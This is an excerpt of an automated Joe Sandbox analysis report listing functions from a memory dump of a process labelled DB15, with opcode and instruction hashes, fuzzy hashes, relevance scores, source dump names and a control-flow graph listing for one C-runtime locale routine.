                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                                                                                                                                                        • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287CA10 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                                                        • Instruction ID: 795a8df15b15ce7cb28705b4863341f57139650e878aa6687362a658500a9afe
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AC19DB5E003599FCB54CFA9C881ADEFBF1FF48204F24856AE919E7301E334AA558B54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02875DE7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                                                                                                                                                                                                                                        • Instruction ID: 42a1fb0f9fd249cbde13db85353f339e9090ac004ea81a8e766ba48f3a61517c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2B18560039FA686CBD3FF30911024BF7E0BFC525DF44194AD99986864EB3EE94E9215
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02877520 Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                                                                                                                                                                                                                        • Instruction ID: aeb7b0f0bf0c3108fc11c6a5eeba127e28680d13de193e35ac530addca9d2a35
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 239115739187BA06D7609EAE8C441B9B6E3AFC4210F9B0776DD9467242C9309E06D7D0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287C760 Relevance: .2, Instructions: 239COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                                                                                                                                                        • Instruction ID: e6a8d465462cb4d867f2c16ff9d5c75f995e13663e6e77d050a2982166ef170c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7B17AB5E002199FCB84CFE9C885ADEFBF0FF48210F64816AD919E7301E334AA558B54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287A916 Relevance: .2, Instructions: 227COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                                                                                                                                                                                                                        • Instruction ID: 9aca02f0fb246cf5da9c589c3e12951b939430ab27efa08b694fea1a51c5169a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F171D573A20B254B8318DEB9CD94192F2F1EF84610B57C27CCE84D7B41E731B95A96C0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028759F7 Relevance: .2, Instructions: 216COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                                                                                                                                                                                                                        • Instruction ID: 3dcf0269dd59a5adf2e74357a25959ca30de09dd1e6612e5f95997f4ecaa591c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 398137B2A047019FC328CF19D885A6AF7E1FFD8210F15892DE99E83B41D770F8558B92
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02878E60 Relevance: .2, Instructions: 207COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                                                                                                                                                                                                                        • Instruction ID: 5394ef80f6483c297727c47490b9d5b199789a099c68f355b8c780f14f323a25
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E8710722535B7A06EBC3DA3D881046BF7D0BE4910AB850956DCD0F3181D72EDE4D77A4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287A699 Relevance: .2, Instructions: 197COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                                                                                                                                                                                                                        • Instruction ID: 4eca6aee972a1d8fc23695584f86b26fdc569cdfea80a006854e3aae408268a8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58815A79A10B669BD754CF2ED8C045AFBF1FB08211B518A2ADCA583B40D334F565CF94
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02879120 Relevance: .2, Instructions: 160COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                                                                                                                                                                                                                        • Instruction ID: 24c49d435aaca64beecbdf9b8c47367e22e6b38960f8e360cdea9ad359cce90c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1561A3339046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A75DC9823642C234EA11DBD0
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02877A80 Relevance: .2, Instructions: 152COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                                                                                                                                                        • Instruction ID: 6648880c2643d7b378a2181b342227cde43102e385f7e110a7ddddb6015b480f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88618C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02877880 Relevance: .1, Instructions: 148COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                                                                                                                                                        • Instruction ID: 44aead48bb0f249a794e6d2591abf29094b1835d0591fe1fc292f73824953513
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B51DD229257B945EBC3DA3D88504BEBBE0BE49106B46055BDCD0B3181C72EDE4DB7E4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02877220 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                                                                                                                                                        • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 027D171C Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820341095.00000000027D0000.00000040.00000020.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_27d0000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                                                                                                                                                        • Instruction ID: 90bcea585e0451e5c151169a69c4ea5d148a10aaa17cc0638c3035891916cabf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6831677980A246DFCB16CE70D891AB5BB71EF87234F9995DCC0898B512D336A04AC794
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028770E0 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                                                                                                                                                        • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02877393 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                                                                                                                                                                                                                        • Instruction ID: 15bba24f23def3be8d2c984f68e3a07702dd95028d560c8de74fe5b2bdddcea9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F3101386183419FD741EF29C880A4BFBE1FFC8358F05D919F9989B221D730E984CA62
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028918D0 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                        • Instruction ID: adc6577b337e259101df78928e6a98f2796d6bde3294acbb36892b9a2f7fbcab
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B11087F2490434FDE54862ED4BC6B6E3D5EBC622BBAC427AD18FCB758D322E1459500
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287B000 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                                                                                                                                                        • Instruction ID: 7a78cd9efd17359dc25d4628b721d2cf947f6ff11695e31b65e53212b5c20f19
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B113D0A8492C4BDCF424A7840E56EBEFA68E2B218F5A71DA88C44B743D01B150FE7A1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287A79A Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                                                                                                                                        • Instruction ID: 252d2e25d5e11afe833a23189da8121e06492a60610b53d3cf8ef048ffd75b2c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB0128768106669BD704DF3EC8C045AFBF1FB082117528B2ADCA483A41D334E662DBE4
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02896437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 551 2896437-2896440 552 2896442-2896446 551->552 553 2896466 551->553 552->553 554 2896448-2896459 call 2899636 552->554 555 2896468-289646b 553->555 558 289645b-2896460 call 2895ba8 554->558 559 289646c-289647d call 2899636 554->559 558->553 564 2896488-289649a call 2899636 559->564 565 289647f-2896480 call 289158d 559->565 570 28964ac-28964cd call 2895f4c call 2896837 564->570 571 289649c-28964aa call 289158d * 2 564->571 568 2896485-2896486 565->568 568->558 580 28964cf-28964dd call 289557d 570->580 581 28964e2-2896500 call 289158d call 2894edc call 2894d82 call 289158d 570->581 571->568 586 28964df 580->586 587 2896502-2896505 580->587 590 2896507-2896509 581->590 586->581 587->590 590->555
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1442030790-0
                                                                                                                                                                                                                                        • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                                                                                                        • Instruction ID: 40abeb5e041a96e4438a0cc609fad69622de90079a6bba804a10d5eff57a02fc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F21A13D108621AFEF227FA9D805E0B7BEADF42764B588029F45DD54A4FB228550CF52
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02893F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
